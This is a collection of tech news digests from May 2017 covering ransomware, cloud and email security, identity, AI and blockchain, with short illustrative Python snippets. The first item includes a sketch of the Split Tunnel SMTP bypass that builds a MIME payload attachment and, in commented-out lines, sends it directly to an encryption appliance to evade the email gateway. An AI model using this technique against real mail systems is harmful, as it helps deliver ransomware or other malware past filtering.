Daily Tech Digest - May 25, 2017

Split Tunnel SMTP Exploit Bypasses Email Security Gateways

The so-called Split Tunnel SMTP Exploit works against pretty much any email encryption device—virtual, hosted or in-house—that accepts inbound SMTP and there's very little anyone can do to stop it, according to the company. Attackers can use the exploit to inject any payload that supports MIME encoding including ransomware, macro viruses and password protected ZIP files. The exploit, says Vikas Singla, CEO of Securolytics, takes advantage of the fact that an email encryption appliance has a publicly accessible IP address and is able to receive and transfer emails. Such devices are typically deployed beyond the enterprise firewall and are often used in conjunction with an email security gateway. Singla says that during an engagement at a healthcare customer site Securolytics discovered an attacker could completely bypass the email security gateway by connecting directly to the encryption appliance.
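The bypass described amounts to speaking SMTP directly to the appliance instead of to the gateway in front of it. A rough sketch of the delivery step, using only Python's standard mail libraries (the host names and the message-building helper are hypothetical, invented purely for illustration):

```python
# Hypothetical illustration of the "split tunnel" bypass: instead of routing
# mail through the filtering gateway, an attacker delivers a MIME-encoded
# payload straight to the encryption appliance's public IP address.
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders

def build_payload_message(sender, recipient, attachment_bytes, filename):
    """Build a MIME message carrying an arbitrary attachment."""
    msg = MIMEMultipart()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "Invoice"
    part = MIMEBase("application", "octet-stream")
    part.set_payload(attachment_bytes)
    encoders.encode_base64(part)  # any MIME-encodable payload fits here
    part.add_header("Content-Disposition", "attachment", filename=filename)
    msg.attach(part)
    return msg

# Delivery step (not executed here): connect to the appliance, not the gateway.
# with smtplib.SMTP("encryption-appliance.example.net", 25) as smtp:
#     smtp.send_message(build_payload_message("a@example.org", "b@example.com",
#                                             b"...", "payload.zip"))
```

Because the appliance accepts inbound SMTP on a public address, nothing in this path ever touches the gateway's filtering.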


Big Data versus money laundering: Machine learning, applications and regulation in finance

ML is efficient, but opaque: "It works, and it works well, but we do not exactly understand why or how." Although that has been said of deep learning, it applies more broadly to ML as well, and coming from experts in the field it is not something to be dismissed lightly. This may raise some philosophical questions, mostly having to do with the increasing feeling of being sidelined and unable to keep up with technology, but there are also some very practical implications. As Mathew notes, whatever anti-money-laundering (AML) approach is taken, getting results is not enough. It must also comply with a number of guidelines, ensuring for example that there is no discrimination against certain groups of the population. The issue of algorithmic transparency is becoming more widely understood and discussed, and there are many examples in which opaque algorithms embody all sorts of bias.


10 ways to protect your Windows computers against ransomware

With the recent WannaCry ransomware infection affecting users on an international scale, the stakes are extremely high for those who rely on technology to protect their data at all costs. This is especially true of critical systems, such as those that provide life-saving care in hospitals, infrastructure used to manage utilities, and information systems used in government services. .... Consideration must also be given to complying with any regulations that may exist specific to your industry. With that said, safeguards are merely that. The risk associated with malware infections is always present, as risk can't be eliminated. But applying multiple security applications as a layered solution provides comprehensive protection on several fronts to minimize the threat of a potential outbreak in accordance with best practices.


The Importance of Teaching Students About Cyber Security

As for teens and pre-teens, it may be a good idea to show them some real examples of Internet sharing gone wrong. Teens like to share what they are doing, who they are with, what they're wearing and many more aspects of their lives on social media. But they usually don't realize that what they post can be viewed by anyone – their teachers, their principal, their families. Even if their accounts are private, kids talk, and word gets around to the adults. And there are ways for strangers to hack right into their accounts and see those posts they thought were private. Even deleting a post is not as sound as it may seem, because once something goes up on the Internet, there are ways to dig it back up even if it's been deleted. Teens need to know that this can greatly affect their reputation now, and in the long run when it comes to getting into college and applying for jobs.


IT still needs the tried-and-true on-premises data center

As regions such as Africa and Asia focus on new data centers, more established data center regions such as the United States are seeing stagnation in new data center builds and more interest in colocation facilities. Over half of enterprise respondents to IDC's annual survey use colocation services. "At this point, a lot of the non-early adopters are testing the waters of the colocation market," Quinn said. Among the other half of respondents, there's still a lot of uncertainty around colocation adoption. IT leaders still ask a variety of questions, said Quinn: How do we engage colocation providers? Which workloads should we migrate? And how secure is this going to be? Colocation providers must help customers answer these questions prior to the initial engagement, which can be a bit of a handholding process.


WannaCry Ransomware Cyberattack Raises Legal Issues

The firm can consider what specific steps can be taken to avoid or mitigate potential civil actions, including private rights of action or class actions regarding a cyber incident. Many states allow for a private right of action to be filed in order to recover damages. On cybersecurity matters, there has been substantial activity involving class actions. Engaging experienced counsel early after the cyber incident may help the firm recognize potential litigation, and counsel can recommend steps to anticipate and mitigate costly legal actions. Another important question involves whether and when to contact law enforcement. Federal authorities recommend that law enforcement be contacted when ransomware occurs.[6] The facts of each case must be carefully considered by the firm. Law enforcement will likely want to obtain relevant data about the cyber incident that is properly authenticated under chain of custody protocols.


Here's How Windows 10's Rapid Release Works & Looks

Pilot, Microsoft says, is the state of an upgrade's first four months, when enterprises should install it only in small-sized pilot programs. (Consumers running Windows 10 Home are always fed from the Pilot channel, and so are roped into testing the earliest versions.) After about four months, Microsoft -- in discussion, it claims, with software developers, hardware partners and customers -- declares an upgrade as fit for wider business deployment and thus flags it as Broad. In one example, Microsoft suggested multiple deployment "rings," or groups in an enterprise, with across-the-board upgrades beginning as soon as the Broad release was available. For 1709, that would be about four months after the September 2017 launch, or in January 2018. A second group, recommended Microsoft, would begin the upgrade process two weeks later. Your company might postpone that further or break the business into more than two Broad groups.


Understanding the benefits and threats when building an IoT strategy

Because it encompasses critical infrastructure components, IoT is a potential target for national and industrial espionage, as well as denial-of-service and other types of attacks. Another major area of concern is privacy: the personal information that will potentially reside within networks, Big Data stores and the cloud is also a potential target for cyber attacks. IoT is still a technology in development, and that must be taken into consideration when evaluating its security needs and requirements. Many devices are connected to the Internet and sending data and information to the cloud, and that will only increase. With the advent of contextual data sharing and autonomous machine actions, IoT will become the allocation of a virtual presence to a physical object, and these virtual presences will begin to interact and exchange contextual information.


82% of Databases Left Unencrypted in Public Cloud

The problem isn't in cloud providers failing to secure data centers, but in organizations failing to secure the applications, content, systems, networks, and users that use the cloud infrastructure. "That is where people are not aware, or not investing the right resources," he continues. Researchers found that of the 82% of databases left unencrypted in the public cloud, 31% were accepting inbound connection requests from the internet. More than half (51%) of network traffic in the public cloud is still on the default web port (port 80) for receiving unencrypted traffic. Nearly all (93%) public cloud resources have no outbound firewall rule, says Badhwar. "You need to have control at the network, configuration, and user layers so it's hard for someone to get in, and harder for them to take your data out," Badhwar emphasizes.
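The kinds of findings the researchers describe can be pictured as a simple audit pass over inbound firewall or security-group rules. The sketch below is invented for illustration; the rule format and database-port list are assumptions, not the researchers' actual tooling:

```python
# Toy audit: flag inbound rules that expose database ports to the whole
# internet, or that serve traffic on the unencrypted default web port (80).
DB_PORTS = {3306, 5432, 1433, 27017}  # MySQL, PostgreSQL, SQL Server, MongoDB

def audit_rules(rules):
    """Return a list of (rule, reason) findings for risky inbound rules."""
    findings = []
    for rule in rules:
        open_to_world = rule["source"] == "0.0.0.0/0"
        if open_to_world and rule["port"] in DB_PORTS:
            findings.append((rule, "database port open to the internet"))
        elif open_to_world and rule["port"] == 80:
            findings.append((rule, "unencrypted HTTP port exposed"))
    return findings
```

Running this over a rule set with, say, PostgreSQL open to 0.0.0.0/0 and a port-80 listener would surface both as findings, while a port-443 listener or a database restricted to an internal range would pass.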


Identity management the new 'perimeter' for hospital cybersecurity

“Ten or 12 years ago, we looked at what it would have taken to buy an identity platform, and it would have taken six or seven different commercial software packages to cobble together a sufficient platform,” Houston said. “Had we done that, we would have replaced all of them by today, either because they no longer would be on the market or because they would be out of date.” Houston added that the most important capabilities of an identity management platform, whether proprietary like UPMC’s or purchased from a vendor, include the ability to understand who your users are and ultimately run analytics on their activities. “We link into our human resources system, our physician credentialing system, we know when people come into our employment, when they change positions, when they leave,” Houston said. “Who they are, where they report to, where they are in the organization, we have a lot of understanding of who these people are.”



Quote for the day:


"Simplicity is a great virtue but it requires hard work to achieve it and education to appreciate it." -- Edsger W. Dijkstra


Daily Tech Digest - May 24, 2017

Identity, authentication and authorisation becoming risk-led

A risk-led approach means organisations can automatically adjust the number of authentication factors required between one and seven, depending on the context and in line with best practice guidelines. In addition to continuous identity assurance and user authentication their way, RSA is also addressing organisations’ need to secure legacy applications. “By putting SecurID on a unified platform, businesses can access cloud applications and on-premise applications in the same place with the convenience of a single sign-on, but without using [the dangerous approach of] synchronising identities in the cloud,” said Darisi. “We provide a 360-degree view of an individual’s identity through our portal – of the person’s role, location and devices - but we do not merge the identity stores,” he said.
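How a risk-led policy might translate context into a factor count between one and seven can be sketched as follows. The signal names and weights are invented for illustration only; they are not RSA's actual scoring model:

```python
# Illustrative sketch: map boolean context signals to a required number of
# authentication factors, clamped to the 1..7 range the article mentions.
def required_factors(signals):
    """Return how many authentication factors a given context demands."""
    weights = {
        "unknown_device": 2,
        "new_location": 1,
        "privileged_account": 2,
        "off_hours_access": 1,
        "impossible_travel": 3,
    }
    score = 1 + sum(w for name, w in weights.items() if signals.get(name))
    return min(max(score, 1), 7)
```

A login from a known device in a usual location would need a single factor, while a privileged account on an unknown device at an unusual hour would be stepped up to several.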


How to fix the broken coding interview

Mimicking the real job of a coder in an interview is enormously difficult, however, particularly when it comes to achieving context. Even in a relatively new codebase it can take months for a programmer to gain sufficient context to be able to contribute at a decent pace. In the past employers have tried to cater for this in their own interview process by having candidates work with a much smaller sample codebase. But companies like Hired have learned even a few hundred lines of code across a handful of files can be overwhelming for a one-hour session. As a result, it is necessary to keep the tasks quite simple, meaning good candidates don't get the chance to properly shine. One way to overcome this is taking that same concept of a smaller codebase but sending it to candidates ahead of time.


New Tool Tallies Your Big Data Debt

"As the big data era emerged, new technologies were created to support modern data structures and to deliver to the always-connected user," he added. "These newer systems have an important role in building modern applications; however, they produce data that is fundamentally incompatible with existing analytical infrastructures including data warehouses, ETL, BI and data science systems like R and Python. As a result, many organizations are collecting significant data debt." Dremio's new Big Data Debt Calculator is intended to help organizations get their arms around this unplanned debt. Dremio says it gives recommendations for minimizing debt, strategies for paying it down, and ways of ensuring it remains within acceptable bounds.


How banks can learn the lessons of BlackBerry

With regulation forcing banks to open up their technology to FinTech firms, startups and other financial service providers, consumers are becoming less reliant on providers of traditional financial services. The idea that one institution will manage all financial services for one customer will no longer be the most viable or the expected model. Open banking creates a new relationship between banks and customers. It requires banks to adopt a customer centric and data centric view on how they do business. In this emerging model, data and services become valuable commodities. To extract value, banks must have the appropriate core-technology and infrastructure in place. It requires a good API governance structure that must include: standards, management policies, data access and statistics, and development processes.


Multi-cloud is a messy reality, but there's hope

While each of the clouds is a solid choice for machine learning, for example, Google generally gets the nod as the frontrunner. Many enterprises will turn to Google for machine learning, AWS for Lambda, Microsoft Azure to modernize their legacy applications, and so on. Such cloud differentiation makes the likelihood of multi-cloud management ever harder. As cloud luminary Bernard Golden told me, "While it appears attractive to use a management tool that encapsulates the individual cloud providers and provides a single management framework, since it promises to reduce costs by amortizing training and employee costs across a greater breadth of applications, in practice it typically means using a lowest-common denominator application management approach, which often forfeits use of functionality that resides within a provider's IaaS/PaaS offerings."


In Search of an Rx for Enterprise Security Fatigue

The security fatigue phenomenon affects consumers and enterprises alike. According to the National Institute of Standards and Technology (NIST), security fatigue is also causing consumers to make poor security decisions, such as reusing the same password across all online accounts. But what enterprises can glean from this report is NIST's suggestions to combat security fatigue, including limiting the number of security decisions that users need to make; making it simple for users to choose the right security action; and designing for consistent decision making whenever possible. But up until a few years ago, many enterprise networks in Fortune 500 companies didn't have the ability to identify a compromised network or subnet in a timely manner. Now, the sheer amount of security measures used to detect a network compromise can create this fatigue. Without knowing what to pay attention to, identifying an inside threat is like trying to find a needle in a haystack.


Why Ansible Has Become The DevOps Darling For Software Automation

One reason it has gained momentum since being acquired by Red Hat may have been the acquisition itself, according to Paul Delory, a research director at Gartner. "We definitely have seen a bump in interest since the acquisition by Red Hat, because it now has more credibility in the enterprise," he says. Part of the reason for this is that there was a perception in the software development and devops community that Ansible's support offering was not as good as that of Puppet or Chef. But under Red Hat's ownership this support gap has been closed, he says. "Support is important to enterprises, and the quality of support available is of critical importance," he adds. But there's more to Ansible's popularity than the availability of decent support options, vital though those options are to enterprise customers.


The Rise Of Toxic Data

Data growth raced ahead while information security fell behind, and the collateral damage is making headlines. Data breaches like those that happened to Sony, Mossack Fonseca, the U.S. Office of Personnel Management (OPM) and the Democratic National Committee (DNC) are practically daily occurrences. Instead of increasing revenues or furthering goals, stolen files and emails disrupt and subvert plans. If an organization stores valuable data (and most store more than they realize), someone will try to steal it. Your next breach may be perpetrated by someone who has never heard of you; ransomware, a form of file extortion, is now a $1 billion business. Worldwide cybersecurity spending is expected to exceed $1 trillion over the next five years, according to Cybersecurity Ventures. So why do organizations still have so many breaches?


Google raises heat on Microsoft with new Chrome bundle for enterprises

"Every couple of years, Google makes noise about Chrome in the enterprise," said Gary Schare, president of Browsium, a maker of browser management tools. Schare was formerly the head of project management for Microsoft's Internet Explorer (IE). "This looks like Google is trying to make Chrome a better citizen in the enterprise." Schare applauded the group policy templates, noting that because Microsoft's own browsers, IE as well as Windows 10's Edge, have traditionally been the best equipped for enterprise management, any help from Google on Chrome would be welcome. The LSB add-on has long been available from the Chrome Web Store, Google's authorized mart for browser extensions. Once configured by company IT administrators, LSB will automatically open IE11 when links clicked within Chrome lead to websites, web services or web apps requiring, for example, an ActiveX control or Java, neither of which Google's browser supports.


With Billions Spent on Cybersecurity, Why Are Problems Getting Worse?

Despite what people generally think, there are surprisingly few regulations that force companies to take reasonable steps to protect their data. Even in areas such as healthcare, regulations like the Health Insurance Portability and Accountability Act lack clarity and are insufficiently enforced. In 2016, more than 27.3 million patient records were breached, but despite this, the Office for Civil Rights (the healthcare security and privacy regulator) settled alleged HIPAA violations with only 12 healthcare organizations. Outside of areas like healthcare, finance, government, etc., most federal security enforcement has defaulted to the Federal Trade Commission, which uses an arcane statute of the Federal Trade Commission Act that prohibits unfair or deceptive practices in the marketplace. This means that only the most egregious violations are penalized, leaving implementation of effective cybersecurity to the discretion of most business leaders.



Quote for the day:


“The electric light bulb did not come from the continuous improvement of candles.” -- Oren Harari


Daily Tech Digest - May 22, 2017

Don't worry CIOs: You still control tech spending

"The growing tech-savviness of business leaders and the wider availability of cloud solutions does mean that business leaders are playing a bigger role in the front end of this process," Bartels says. But the persistence of licensed software, the growing adoption of cloud as a replacement for licensed software, and challenges of implementing and optimizing solutions mean that CIOs and tech management teams still play a dominant role in overall tech purchases. Moreover, CIOs are procuring software-as-a-service (SaaS) solutions — the top shadow IT target for business leaders — more than ever as it allows them to meet business requirements. “That becomes a mechanism to manage demand,” Bartels says. CompTIA just announced similar findings from a survey of 675 U.S. businesses in its report, “Considering the New IT Buyer.”


Digital India must protect itself with well-crafted cloud security strategy

As the government's cloud strategy takes shape, this is the time to move over to security in the cloud paradigm. It will require a radical reassessment and revamping of existing security provisions, because a move to the cloud changes the technology landscape quite drastically. The new paradigm must incorporate the spirit of the legacy security provisions, but requires much more sophistication to secure a hybrid cloud setup. Furthermore, it is critical that this broad-gauged security policy be executed uniformly across all components of the hybrid cloud. This is where cloud security gateways and security brokers come into action. Rather than leave it to individual systems in the cloud to take care of their own security (as is the case in the legacy setup), a cloud security broker can monitor and defend the entire cloud and all the systems within. Security across all the different systems is addressed holistically, regardless of where the systems may reside.


Digital transformation: MIT's Westerman shares new lessons

Successful digital transformation is like a caterpillar turning into a butterfly. It’s still the same organism, but it now has superpowers. Unfortunately, when it comes to digital transformation, many senior execs aren’t thinking about butterflies. They’re just thinking about fast caterpillars. And it’s hard to keep up with your competitors if you’re crawling ahead while they can fly. ... It would be nice to think that companies and governments would be responsible for finding new roles for the people who are displaced by technology. But more realistically, people need to be responsible for their own professional development. Stay abreast of what is happening with industries and technologies. If you’re in a job that will die soon, do what you can to shift to another. Hopefully, our society will find ways to help people who lose in the race against machines.


HP'S Spectre X2 May Be The Surface Pro Killer We've Been Waiting For

Going outside the box, HP has seriously revamped the Spectre x2's screen to a 12.3-inch diagonal size and 3000x2000 resolution. Compared to the first-gen Spectre x2's 16:9, 1920x1080 panel, this new model has the same aspect ratio as Microsoft's Surface Pro 4. The newer screen is IPS and brighter, too, with a maximum of 450 nits, slightly better than the Surface Pro 4 panel's spec. HP has also cloned the Surface Pro 4's pen tech. The original Spectre x2 used a Wacom-based pen, while the 2nd gen replaces Wacom with N-trig, which Microsoft uses for its own Surface Pen. Microsoft even bought N-trig. The N-trig pen's main appeal to PC makers is its ability to use the capacitive touch layer to sense the pen. Wacom-based devices require a separate digitizer, which adds thickness to the screen.


How A Common Language For Cyber Threats Boosts Security

Orchestration and automation may be the most significant advantages governments obtain when they adopt standard threat information formats. It’s no secret there is a cybersecurity talent shortage. To manage a growing volume of increasingly sophisticated threats, it is critical to have infrastructure and security tools that enable quick, automated and synchronized responses without human intervention. The goal of OpenC2 and other groups' work is to expand the development of orchestration software and standardized command-and-control languages. Central to the OpenC2 movement’s platform is the idea that standardizing language between machines enables rapid response to shared threat intelligence. As the OpenC2 forum states, “Future defenses will require the sharing of indicators, the coordination of responses between domains, synchronization of cyber defense mechanisms and automated actions at machine speed against current and pending attacks.”
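For a flavor of what such a standardized command language looks like, here is a command roughly in the shape of published OpenC2 examples: a "deny" action against an IPv4 network. Treat it as an illustration of the idea rather than a validated OpenC2 document:

```python
# One defense tool emits a machine-readable command; another parses and acts
# on it. Standardized field names are what make this interoperable.
import json

command = {
    "action": "deny",
    "target": {"ipv4_net": "198.51.100.0/24"},
    "args": {"response_requested": "ack"},
}

wire_form = json.dumps(command)   # what the sending tool transmits
received = json.loads(wire_form)  # what the receiving tool parses back
```

Because both sides agree on the vocabulary ("deny", "ipv4_net"), a firewall, a router, and an endpoint agent from different vendors can all act on the same command at machine speed.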


How the CISO moved from the basement to the boardroom

If the CISO is overwhelmed with projects, it can be helpful to determine which departments you are serving, who the stakeholders are, and what is critical to them, Hayslip said. That will help you create a more narrow list of issues to tackle. It's often wise to start with cyber hygiene, he added: If you have basic security policies and patch management, antivirus, and firewalls in place, updated, and managed, it builds a strong foundation for your organization's cyber health. CISOs also have an opportunity to redefine their role as a business strategist during the digital transformation, Pollard said. To prove their value, they should spend time mapping the firm's technology touchpoints, foster security champions across the company, and get involved with customer-facing activities like product design and development, he added.


How Cybersecurity Benefits from Hackers

To put it simply, many of those who identify themselves as “hackers” are very talented programmers. The creators of some of the most well-known software are self-proclaimed hackers. Among these hackers-turned-programmers are Mark Zuckerberg, founder of Facebook; Linus Torvalds, the creator of Linux; and Tim Berners-Lee, one of the driving forces behind the creation of the World Wide Web. Often, these programmers will seek a solution that doesn’t involve working with one of the entrenched proprietary software companies. Instead, they will create open-source projects, where the source code is made publicly available. The programming community, including several who identify as hackers, works together to produce software solutions that are available to everyone. Even people who never use open-source software benefit from these projects, as the public community will often create new innovations that the proprietary companies either use for inspiration or simply copy outright.


Google, A.I. and the rise of the super-sensor

Here's a simplified version of how such a sensor might work in a warehouse setting. You plug in one or a few super sensors. Then somebody uses a forklift. The resulting vibration, sound, heat and movement detected by the super sensor generate patterns of data that are fed into the system. You can identify this as "forklift in operation." (Further tweaking might determine not only when a forklift is in use, but where it is, how fast it's moving, how much weight it's carrying and other data.) You can then program next-level applications that turn on a warning light when the forklifts are moving, calculate wear-and-tear on forklift equipment or detect unauthorized operation of forklifts. The output from these "synthetic sensors" can be used by developers to create any kind of application necessary, and applied to semantic systems for monitoring just about anything.
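The pattern-matching step described above can be caricatured as nearest-pattern classification over a feature vector. The features, values, and labels below are made up purely to show the shape of the idea:

```python
# Toy "synthetic sensor": match a raw feature vector
# (vibration, sound, heat, motion) to the closest labeled pattern.
import math

PATTERNS = {
    "forklift in operation": (0.9, 0.8, 0.6, 0.9),
    "room idle":             (0.1, 0.1, 0.3, 0.0),
    "door opening":          (0.3, 0.5, 0.3, 0.6),
}

def classify(features):
    """Return the label whose stored pattern is nearest (Euclidean distance)."""
    def dist(a, b):
        return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))
    return min(PATTERNS, key=lambda label: dist(features, PATTERNS[label]))
```

A real system would learn these patterns from training data rather than hard-code them, but the downstream idea is the same: applications consume the label ("forklift in operation"), not the raw signals.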


Lessons From Women IT Leaders On How To Transcend The Middle Order

“Women must make themselves visible for the right skills and projects, and to the right people, if they want to advance into senior leadership,” says Ghosh. Women, especially in enterprise IT, says Ghosh, must be vocal about their goals and ambitions, and this is one way they can deal with implicit bias. “The other thing is that even organizations must acknowledge the bias,” says Dar. “Consciously or unconsciously, we are discriminated against, and when these things come to light they have to be handled with the same importance as any other labour matter. Just pushing it under the rug does not work anymore,” says Dar. Her company, Godfrey Phillips, runs awareness sessions for employees, “and that is something all companies should run on a timely basis,” she says. Within organizations too, Vijay says, it is very important to introduce programs aimed at increasing the representation of women in IT leadership positions.


Companies Ramp Up Recruiting Veterans As Cybersecurity Urgency Grows

Like most new hires, veterans in the private sector must navigate a culture that’s vastly different from military life. When Navy veteran Dana Hawkins took his first private sector job as a contractor, “just getting used to the lack of process” at some smaller companies compared to the stringent cybersecurity processes of the military was a big challenge. Hawkins is now director of security services at Proficio. Other veterans find it challenging to work with a virtual team after years of direct contact with leaders. “It takes a while for our veterans to get used to it,” Stoner says. To smooth the transition, PwC assigns veteran mentors to help new hires assimilate into the firm. Stoner, an Army veteran and reservist himself, finds that military “athletes” – those veterans with leadership, self-discipline and a goal-oriented approach – make the best transition to private sector cybersecurity careers, and there’s plenty of room for more.



Quote for the day:


"Careers, like rockets, don't always take off on schedule. The key is to keep working the engines." -- Gary Sinise


Daily Tech Digest - May 21, 2017

Using ‘Faked’ Data is Key to Allaying Big Data Privacy Concerns

The MIT researchers, led by Kalyan Veeramachaneni, proposed a concept they call the Synthetic Data Vault (SDV). This describes a machine learning system that creates artificial data from an original data set. The goal is to be able to use the data to test algorithms and analytical models without any association to the organisation involved. He succinctly states: “In a way, we are using machine learning to enable machine learning.” The SDV achieves this using a machine learning algorithm called “recursive conditional parameter aggregation”, which exploits the hierarchical organisation of the data and captures the correlations between multiple fields to produce a multivariate model of the data. The system learns the model and subsequently produces an entire database of synthetic data. To test the SDV, synthetic data generation was performed for five different public datasets.
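In heavily simplified form, the SDV idea is: fit a statistical model to the real table, then sample entirely new rows from the model, so analysts never touch the real records. The sketch below is a toy under stated assumptions, not the actual SDV algorithm: it fits each numeric column with an independent normal distribution, whereas the real system also captures cross-column correlations and table hierarchy:

```python
# Toy synthetic-data generator: learn per-column statistics from the real
# table, then emit brand-new rows drawn from the learned distributions.
import random
import statistics

def fit_model(rows):
    """Learn per-column mean and standard deviation from the real data."""
    columns = rows[0].keys()
    return {c: (statistics.mean([r[c] for r in rows]),
                statistics.stdev([r[c] for r in rows])) for c in columns}

def sample_synthetic(model, n, seed=0):
    """Draw n synthetic rows; no real record is ever emitted."""
    rng = random.Random(seed)
    return [{c: rng.gauss(mu, sigma) for c, (mu, sigma) in model.items()}
            for _ in range(n)]
```

The synthetic rows preserve the broad statistical shape of the original data while containing no actual records, which is what makes them usable for testing algorithms without privacy exposure.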


AI Platforms: How to Make the Smart Choice

Companies will in all likelihood build an infrastructure that uses more than one platform. The company-specific business technology platform can easily become a platform of technology platforms. If these platforms, and the applications on top of them, do not play nicely, the company will have a hard time providing customers with positive engagements that leave a good impression. Instead, there will be inconsistency and duplication of data and broken processes, hence frustrated employees and customers; in summary, poor experiences for everybody involved. And not concentrating on good experiences leaves companies with missed opportunities, as studies like this one show. ... If there already are platform-based business applications available, then it is a good option to look at what the vendor's underlying AI platform is offering, always keeping in mind the answer to the question “What experiences do you want to deliver?”


How to Handle the Data Deluge and Drive Business Success

The challenge for organizations is pulling all the critical data together into a coherent view of the business that allows them to confidently act on well-founded plans. Increasingly, CFOs are being tasked with not only understanding and communicating financial results but also with helping the organization understand the operational drivers behind them, requiring a more detailed analysis of business KPIs, many of which are non-financial. In fact, a recent report (Adaptive Insights CFO Indicator, Q3 2016) found that 76 percent of CFOs are tracking non-financial KPIs, which involves greater collaboration across the organization and data integration to create a holistic view of the business. While it is positive that so many CFOs are taking this step to become a more strategic advisor, this influx of new data can pose a problem when it comes to consolidation.


Harnessing the Secret Structure of Innovation

Reassuringly, many innovators already have the tools to do so: Companies routinely re-engineer competitors’ products, analyze the patent landscape, and conduct interviews with technology experts to guide their operational decisions. We believe innovators can and should also use these same tools and information to guide their strategy by methodically measuring the evolution of product complexity in their space. This requires developing a taxonomy of components by sampling competitors’ products and dissecting not only physical components but also intangible ones like process innovations or business model choices. While we are not aware of any company that is yet explicitly doing this, we do see that many startups implicitly follow this logic by shifting from an impatient minimum viable product (MVP) logic to more patient innovation centered on more complex designs once cash flow and funding have been secured and the space begins to mature.


Data protection is not just an IT issue

Independent Cybersecurity Expert Dr Jessica Barker said: “With so many data breaches hitting the headlines, there can be a sense of defeatism among some organisations. Breaches are seen as inevitable, so some organisations question the value of spending on security when it won’t make them 100% secure. However, this research has found that investing in security helps protect the organisation even when the worst happens, as companies with a strong security posture experience much quicker stock price recovery than those with a poor security posture following a data breach.” “In this past year alone we’ve seen high-profile data breaches, such as Yahoo and TalkTalk, experience the significant consequences that a breach can have on shareholder value and brand reputation,” said Bill Mann, senior vice president of products and chief product officer, Centrify.


A More Practical Approach to Encrypting Data in Motion

RSA and Elliptic Curve Cryptography are two classes of algorithms that achieve these characteristics. The keys associated with these algorithms can be serialized and encoded in special files called X.509 certificates. Certificates contain a ton of other information like names, network addresses, and dates. When people refer to certificates, they usually are referring to X.509 certificates that contain public keys. Data (like certificates) can be digitally signed. Digital signatures are, in essence, hashes encrypted with a private key. A good hash function is one that’s hard to reverse and not prone to collisions. If you apply a good hash function to a message, the result of the function does not reveal anything about the original message. Further, a good hash function is unlikely to produce the same resultant value (also called a collision) for any two messages.
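A minimal sketch of the hash-function properties described above, using Python's standard hashlib (an illustration, not tied to any particular product; the messages are made up): the digest is deterministic, reveals nothing useful about the input, and changes completely under a tiny input change.

```python
import hashlib

def digest(message: bytes) -> str:
    """Return the hex SHA-256 digest of a message."""
    return hashlib.sha256(message).hexdigest()

# The same input always yields the same digest...
assert digest(b"pay $100 to alice") == digest(b"pay $100 to alice")

# ...but a one-character change produces a completely different one
# (the "avalanche effect"), which is why finding two messages with
# the same digest (a collision) is computationally infeasible.
print(digest(b"pay $100 to alice"))
print(digest(b"pay $900 to alice"))
```

A digital signature then amounts to computing such a digest and encrypting it with a private key, so anyone with the public key can verify both integrity and origin.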


Graph databases and RDF: It's a family affair

Should we just dismiss RDF as impractical and RDF stores as inferior software delivered by academics and move on? Maybe not so fast. There are RDF vendors who are entirely professional about what they do, and RDF does have certain things to offer that are not there in other graph data models. We had a discussion with Vassil Momtchev, GraphDB product owner at Ontotext, about the benefits and use cases of RDF. Ontotext's legacy is in text mining algorithms; however, these days it is mostly known for GraphDB, its RDF graph database engine. "Our text mining is backed by a complex semantic network to represent background and extracted knowledge. Back in 2006, we found that none of the existing RDF databases were able to match our requirements for a highly scalable database. This was how GraphDB started," says Momtchev.
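To make the RDF data model concrete, here is a toy sketch in plain Python (hypothetical facts, and dict-based matching rather than a real RDF store such as GraphDB): everything is a subject-predicate-object triple, and a query is a pattern with wildcards, much like a SPARQL basic graph pattern.

```python
# A tiny in-memory "triple store": RDF represents all data as
# (subject, predicate, object) triples.
triples = {
    ("GraphDB", "developedBy", "Ontotext"),
    ("GraphDB", "type", "RDFDatabase"),
    ("Ontotext", "focusArea", "TextMining"),
}

def match(s=None, p=None, o=None):
    """Return triples matching a pattern; None acts as a wildcard,
    like a variable in a SPARQL basic graph pattern."""
    return [t for t in triples
            if (s is None or t[0] == s)
            and (p is None or t[1] == p)
            and (o is None or t[2] == o)]

# "What do we know about GraphDB?"
for triple in match(s="GraphDB"):
    print(triple)
```

Because every fact has the same shape, arbitrary graphs can be merged and queried without a fixed schema, which is the flexibility RDF proponents point to.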


Digital Currencies Like Bitcoin and Ethereum are Booming

The ethereum dream. Just by some code that no one can stop, we’ll bring back money to the people. Not because we dislike banks or governments, but because they too will see that it is better for money, the regulator of the free market, to itself be regulated by the free market. That statement isn’t a hypothesis, but the insight of Hayek, a Nobel Prize winner who spent his life studying money. So the foundations of this space are built on strong and mainstream grounds, not fringe thoughts as many were led to believe in previous years. Its walls are futuristic in architecture. We are digitizing money, making it dynamic, turning it into code, while giving it a very primitive level of intelligence, in that we can tell it to do things and it does them. Only imagination can constrain the applications, and the benefits, for poor or rich, for banks and governments or the people, will probably be very considerable. To the point where we might actually get those flying cars in our own lifetime.


IoT and Blockchain Technology Collide in the Payments Industry

The collision between the IoT and blockchain worlds portends some important payments industry developments around the efficient tracking of device payment history, all supported by a ledger of secure data exchanges among devices, web systems and users. Further, this technological convergence also shows promise in terms of the use of smart devices that are programmed to conduct a variety of transactions such as the automatic issuance of invoices and payments.  Dan Loomis, vice president and director of mobile product management at the business and financial software firm Intuit, is firmly entrenched in this evolving IoT/blockchain conversation through his work in creating payment experiences for businesses that operate on a global scale, and brought this expertise to the TRANSACT panel discussion.
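The "ledger of secure data exchanges among devices" idea can be sketched as a toy hash chain (hypothetical field names and events; real blockchains add signatures, consensus, and distribution on top): each entry commits to the hash of the previous one, so any tampering with a device's payment history becomes detectable.

```python
import hashlib
import json

def make_block(payload: dict, prev_hash: str) -> dict:
    """Append-only ledger entry: each block commits to the previous
    block's hash, chaining the history together."""
    block = {"payload": payload, "prev_hash": prev_hash}
    serialized = json.dumps(block, sort_keys=True).encode()
    block["hash"] = hashlib.sha256(serialized).hexdigest()
    return block

# A toy ledger of device payment events
genesis = make_block({"event": "device registered"}, prev_hash="0" * 64)
payment = make_block({"event": "invoice issued", "amount": 12.50},
                     prev_hash=genesis["hash"])

def verify(chain) -> bool:
    """Recompute every block's hash and check the chain links."""
    prev = "0" * 64
    for block in chain:
        body = {k: v for k, v in block.items() if k != "hash"}
        expected = hashlib.sha256(
            json.dumps(body, sort_keys=True).encode()).hexdigest()
        if block["hash"] != expected or block["prev_hash"] != prev:
            return False
        prev = block["hash"]
    return True

assert verify([genesis, payment])
```

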